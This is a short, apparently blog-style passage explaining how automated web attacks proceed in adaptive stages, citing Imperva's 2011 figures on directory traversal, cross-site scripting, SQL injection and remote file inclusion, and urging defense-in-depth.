Well, really there are far more, but the latest study from Imperva of 10 million attacks against 30 large organizations from January to May of 2011 cites a cocktail of techniques used by would-be hackers to spot the weaknesses and exploit them. For those of us who’ve tailed a log file spinning out of control during an attack attempt, those numbers seem plausible. Over time, attacks have become slick and automated, often progressive, and adaptive, targeting the next phase based on what was found in the last.
To understand a typical hack attempt, visualize a typical commercial office space break-in. There may first be a surveillance phase. Following that is a second phase that determines which doors are locked. Then, if an unlocked door is found near a machine shop, you may adapt your attack to include a truck to haul heavy equipment out during the theft. On the other hand, if you find a door open by an accounting office, you may adapt your attack to use a single backpack to steal an equivalent value. Attacks of the variety we’re talking about here follow progressive stages of discovery, adapting as they go to the “terrain” they find in a similar manner, and using different sets of tools for each.
To apply our analogy to a hack attempt, the first stage will be general, just trying to get the lay of the land, basically see what the hacker may be up against. The second phase will attempt to identify potential holes. Depending on the type of information discovered, the hacker will tailor the tool cocktail (and sequence) needed to get what’s likely inside. Some of the more popular styles found in Imperva’s study against Web applications were directory traversal (37%), cross site scripting (36%), SQL injection (23%), and remote file include (4%), aka RFI. Often these were used in combination.
Our goal here isn’t to help you better hack a website. But by understanding the mindset of a thief, you may be able to better assess the weaknesses in your systems, and bolster them accordingly. It also highlights the advice to build your systems with a defense-in-depth approach. This allows the least amount of access needed for a given task and separates functionality so a breach in a single system doesn’t allow a breach in another. Also, this helps to shed the load of would-be attacks at a perimeter layer before they have a chance to slow down or stop your content servers from functioning like they should.